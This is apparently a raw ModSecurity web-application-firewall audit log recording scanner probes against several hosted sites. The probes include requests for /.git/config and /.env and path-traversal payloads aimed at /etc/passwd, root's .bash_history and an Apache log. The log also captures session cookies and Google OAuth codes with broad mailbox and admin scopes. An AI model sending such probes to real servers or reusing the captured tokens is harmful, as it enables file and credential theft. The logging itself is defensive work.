XSRF-TOKEN=eyJpdiI6IjByMnJZVjQ4NHlJRDZ1TEFHeTZTWVE9PSIsInZhbHVlIjoidURDTWFZQ0pTdUYxazVhSGQ1Y21zUS9VNXVicU1mUm1lejU5TnZVcW1NdkNGZndYY3prQVYyckxLM241OVN4bG1qeE15bEVsMWR2ME9SdjR6UDN1ZmtVaUo3aTVPTjhIZ0ZJQ0hVbU1OaEVCUU05bjFPdGExZzRaVmV0dHhPZWkiLCJtYWMiOiJjNmJmOWM2Zjg0M2U1ZTBjNTIzZWQxYWJiYWM2NmJhOGQwZTM0ZjBkMDJkODFmODUwMTExNjk5NDBiODQwY2RiIiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 16:05:12 GMT; Max-Age=7200; path=/; secure; samesite=lax Set-Cookie: ghgverozonesolutions_session=0tTrAf40c1SNtehY93sQ6YRmSRaSzs341KCeh8A9; expires=Thu, 24 Jul 2025 16:05:12 GMT; Max-Age=7200; path=/; httponly; samesite=lax Upgrade: h2,h2c Connection: Upgrade, close Location: https://globalhealthgate.net Content-Type: text/html; charset=utf-8 --ee358e5f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "globalhealthgate.net"] [uri "/.git/config"] [unique_id "aII9mPFbyHsjieS2RGDlBQAAAMs"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: PHP Request Startup: open_basedir restriction in effect. File(/opt/alt/php82/var/lib/php/session) is not within the allowed path(s): (/var/www/vhosts/globalhealthgate.net/:/tmp/) in Unknown on line 0' Apache-Handler: proxy:unix:/var/www/vhosts/system/globalhealthgate.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753365912619623 415100 (- - -) Stopwatch2: 1753365912619623 415100; combined=87329, p1=633, p2=2082, p3=0, p4=0, p5=42360, sr=213, sw=1, l=0, gc=42253 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ee358e5f-Z-- --e4858301-A-- [24/Jul/2025:17:05:14.337965 +0300] aII9mvFbyHsjieS2RGDlFgAAAMk 212.227.9.59 37862 127.0.0.1 7081 --e4858301-B-- GET /.git/config HTTP/1.0 Host: globalhealthgate.net X-Real-IP: 212.227.9.59 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* --e4858301-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.23 Cache-Control: private, must-revalidate pragma: no-cache expires: -1 Set-Cookie: XSRF-TOKEN=eyJpdiI6InM4d2h3UjZ2citUc3RVSWZyUEc3ZlE9PSIsInZhbHVlIjoidm5rTVl2cnZqeTByL0lpUEFYa0plQkdjVVNMZmVXc2MrVEUwWVJscjFhRHgrd3J1aWJWa0lWaHF0MnZuWDArMEluL0hCV0ZxU0YzYzlxaE05ejZrdW1FT2ZtRDhuNHM0azdLSXdxOVlCOEZzRFVUQ0FUQWkvajMrV1E0WEpoMjIiLCJtYWMiOiIxNmUzYmQyNGYyYjlmNjE1MTlmOWNmYmU1ZGEyYjgyN2JjYTIzNWY4MTI1ZDJhOWY4MDI2NmJiZWJhMzZmODFkIiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 16:05:14 GMT; Max-Age=7200; path=/; secure; samesite=lax Set-Cookie: ghgverozonesolutions_session=mgBEC9hxuPH25lOpzTFlWnIZB6wGf57x3T7YpM1a; expires=Thu, 24 Jul 2025 16:05:14 GMT; Max-Age=7200; path=/; httponly; samesite=lax Upgrade: h2,h2c Connection: Upgrade, close Location: https://globalhealthgate.net Content-Type: text/html; charset=utf-8 --e4858301-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "globalhealthgate.net"] [uri "/.git/config"] [unique_id "aII9mvFbyHsjieS2RGDlFgAAAMk"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: PHP Request Startup: open_basedir restriction in effect. File(/opt/alt/php82/var/lib/php/session) is not within the allowed path(s): (/var/www/vhosts/globalhealthgate.net/:/tmp/) in Unknown on line 0' Apache-Handler: proxy:unix:/var/www/vhosts/system/globalhealthgate.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753365914021861 316216 (- - -) Stopwatch2: 1753365914021861 316216; combined=2465, p1=530, p2=1832, p3=0, p4=0, p5=102, sr=138, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e4858301-Z-- --667fa566-A-- [24/Jul/2025:17:07:01.654344 +0300] aII-BfFbyHsjieS2RGDocgAAANg 128.199.212.166 41230 127.0.0.1 7081 --667fa566-B-- GET /.env HTTP/1.0 Host: globalhealthgate.net X-Real-IP: 128.199.212.166 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --667fa566-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.23 Cache-Control: private, must-revalidate pragma: no-cache expires: -1 Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik11WGh3eUtmTkFydTVyWVd2YmtzNGc9PSIsInZhbHVlIjoiR2xyeDJPbE1iSi9SYS85QVFoZENrYkgxSFN2SU8wT0ZkelBWbTEwbU5vaHlaenFtV3VmalU2Sk5QZEVFa1FpbEUxQjNHVG5Hb3NiYlloL0tlcGwzYUFLUDVWU001YVF1T2ExUmNNWXcvemhDZjFGWFlZSlZJMlBTeXhaSng0SmYiLCJtYWMiOiIwMzU3NDg2NmM5ZTZlMmZhNjFjZWEwODJlOGRiYjRlYjUyODIyYTM2ZjY3NDY1NDQ0ZDNjZGViZWU5ZjA0ZTAxIiwidGFnIjoiIn0%3D; expires=Thu, 24 Jul 2025 16:07:01 GMT; Max-Age=7200; path=/; secure; samesite=lax Set-Cookie: ghgverozonesolutions_session=0eJBMIfJ9cUk8nq8Px1CxgEXy7YOYzt5JTWMV0xQ; expires=Thu, 24 Jul 2025 16:07:01 GMT; Max-Age=7200; path=/; httponly; samesite=lax Upgrade: h2,h2c Connection: Upgrade, close Location: https://globalhealthgate.net Content-Type: text/html; charset=utf-8 --667fa566-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "globalhealthgate.net"] [uri "/.env"] [unique_id "aII-BfFbyHsjieS2RGDocgAAANg"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: PHP Request Startup: open_basedir restriction in effect. File(/opt/alt/php82/var/lib/php/session) is not within the allowed path(s): (/var/www/vhosts/globalhealthgate.net/:/tmp/) in Unknown on line 0' Apache-Handler: proxy:unix:/var/www/vhosts/system/globalhealthgate.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753366021278191 376309 (- - -) Stopwatch2: 1753366021278191 376309; combined=2719, p1=515, p2=2058, p3=0, p4=0, p5=145, sr=140, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --667fa566-Z-- --58409d03-A-- [24/Jul/2025:17:12:02.930192 +0300] aII_MvFbyHsjieS2RGDvLgAAANU 78.40.176.204 45362 127.0.0.1 7081 --58409d03-B-- GET /administration/index.php?code=4/0AVMBsJhV1fP3aYCFKYEwcYFAu1RcMoGWzhwIb3qk3ER12mxRhFov7rRBMa_580XK8tBjEw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 78.40.176.204 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?1 sec-ch-ua-platform: "Android" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8,tr;q=0.7 priority: u=0, i cookie: PHPSESSID=mg49294fdu8bkendktijui6td1 --58409d03-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --58409d03-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aII_MvFbyHsjieS2RGDvLgAAANU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753366322455966 475138 (- - -) Stopwatch2: 1753366322455966 475138; combined=7393, p1=1725, p2=5259, p3=153, p4=86, p5=169, sr=566, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --58409d03-Z-- --e9af4271-A-- [24/Jul/2025:17:17:56.767281 +0300] aIJAlEQ7UIwkHXYqnpyfCAAAAAw 78.40.176.204 57718 127.0.0.1 7081 --e9af4271-B-- GET /administration/index.php?code=4/0AVMBsJjTcmRbW8f15mo57grvctN2Lk8gGTT9y9ZsMUGtmveoxs9DTsJjgDobJiumrETbGQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 78.40.176.204 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?1 sec-ch-ua-platform: "Android" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8,tr;q=0.7 priority: u=0, i cookie: PHPSESSID=3argd7d6u8r28bbgb7somqvlh6 --e9af4271-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --e9af4271-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIJAlEQ7UIwkHXYqnpyfCAAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753366676323840 443741 (- - -) Stopwatch2: 1753366676323840 443741; combined=6994, p1=862, p2=5759, p3=134, p4=74, p5=164, sr=273, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e9af4271-Z-- --4d33ec11-A-- [24/Jul/2025:17:30:32.366374 +0300] aIJDh_FbyHsjieS2RGAI7wAAAM8 213.204.92.102 33706 127.0.0.1 7081 --4d33ec11-B-- GET /administration/index.php?code=4/0AVMBsJjk7Ch3nNKLbLAoLevyHsS7tqVagZnHd3L_hLX6MCdP6cKBYqNgDpjjCB09T7jcpg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 213.204.92.102 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=r37o2bhuv1q2c9ak74f488cob2 --4d33ec11-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --4d33ec11-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIJDh_FbyHsjieS2RGAI7wAAAM8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753367431939289 427331 (- - -) Stopwatch2: 1753367431939289 427331; combined=5564, p1=661, p2=4505, p3=152, p4=93, p5=152, sr=224, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4d33ec11-Z-- --34213678-A-- [24/Jul/2025:17:32:32.954290 +0300] aIJEAPFbyHsjieS2RGALYQAAAM0 198.55.98.93 53010 127.0.0.1 7081 --34213678-B-- GET /.git/config HTTP/1.0 Host: test.kime.agency X-Real-IP: 198.55.98.93 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: facebookexternalhit/1.1 Accept-Charset: utf-8 Accept-Encoding: gzip --34213678-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 25 Jan 2023 19:33:35 GMT ETag: "328-5f31bb5588323" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --34213678-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.kime.agency"] [uri "/.git/config"] [unique_id "aIJEAPFbyHsjieS2RGALYQAAAM0"] Stopwatch: 1753367552950052 4324 (- - -) Stopwatch2: 1753367552950052 4324; combined=2299, p1=485, p2=1749, p3=0, p4=0, p5=64, sr=126, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --34213678-Z-- --a3dbd909-A-- [24/Jul/2025:17:52:11.515015 +0300] aIJIm_FbyHsjieS2RGAnGwAAAMQ 185.177.72.144 49706 127.0.0.1 7081 --a3dbd909-B-- GET /?asset=../../../../root/.bash_history HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a3dbd909-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 Expires: Tue, 01 Jan 2000 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2025 14:52:11 GMT Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 186 Content-Type: text/html; charset=UTF-8 --a3dbd909-H-- Message: Warning. Matched phrase "root/.bash_history" at ARGS:asset. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||itilebanon.com|F|2"] [data "Matched Data: root/.bash_history found within ARGS:asset: ../../../../root/.bash_history"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "root/.bash_history" at ARGS:asset. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||itilebanon.com|F|2"] [data "Matched Data: root/.bash_history found within ARGS:asset: ../../../../root/.bash_history"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "itilebanon.com"] [uri "/"] [unique_id "aIJIm_FbyHsjieS2RGAnGwAAAMQ"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: Undefined variable $title in /var/www/vhosts/itilebanon.com/httpdocs/index.php on line 1' Apache-Handler: proxy:unix:/var/www/vhosts/system/itilebanon.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753368731499073 16114 (- - -) Stopwatch2: 1753368731499073 16114; combined=3909, p1=610, p2=3012, p3=122, p4=75, p5=90, sr=175, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a3dbd909-Z-- --8b36a63a-A-- [24/Jul/2025:17:52:11.651091 +0300] aIJIm_FbyHsjieS2RGAnHwAAAM4 185.177.72.144 49734 127.0.0.1 7081 --8b36a63a-B-- GET /?data=../../../../etc/passwd HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8b36a63a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 Expires: Tue, 01 Jan 2000 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2025 14:52:11 GMT Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 186 Content-Type: text/html; charset=UTF-8 --8b36a63a-E-- <title>Welcome to Jinan University System </title> <head> </head> <body> <div id="container"> <div id="photo"> </div> <div id="logo"> </div> <div id="main"> <div id="position"><h3 align="center">Welcome to Jinan University System</h3></div> <br><br> </div> <br> </div> </div> </body> --8b36a63a-H-- Message: Warning. Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||itilebanon.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?data=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "etc/passwd" at ARGS:data. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||itilebanon.com|F|2"] [data "Matched Data: etc/passwd found within ARGS:data: ../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|itilebanon.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||itilebanon.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?data=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/"] [unique_id "aIJIm_FbyHsjieS2RGAnHwAAAM4"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:data. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||itilebanon.com|F|2"] [data "Matched Data: etc/passwd found within ARGS:data: ../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "itilebanon.com"] [uri "/"] [unique_id "aIJIm_FbyHsjieS2RGAnHwAAAM4"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: Undefined variable $title in /var/www/vhosts/itilebanon.com/httpdocs/index.php on line 1' Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|itilebanon.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "itilebanon.com"] [uri "/index.php"] [unique_id "aIJIm_FbyHsjieS2RGAnHwAAAM4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/itilebanon.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753368731641375 9797 (- - -) Stopwatch2: 1753368731641375 9797; combined=5649, p1=1067, p2=4300, p3=51, p4=67, p5=164, sr=454, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8b36a63a-Z-- --fee7c216-A-- [24/Jul/2025:17:52:11.786972 +0300] aIJIm0Q7UIwkHXYqnpy03wAAAAM 185.177.72.144 49788 127.0.0.1 7081 --fee7c216-B-- GET /..%5c..%5c..%5c..%5c..%5c..%5cvar/log/apache2/access.log HTTP/1.0 Host: itilebanon.com 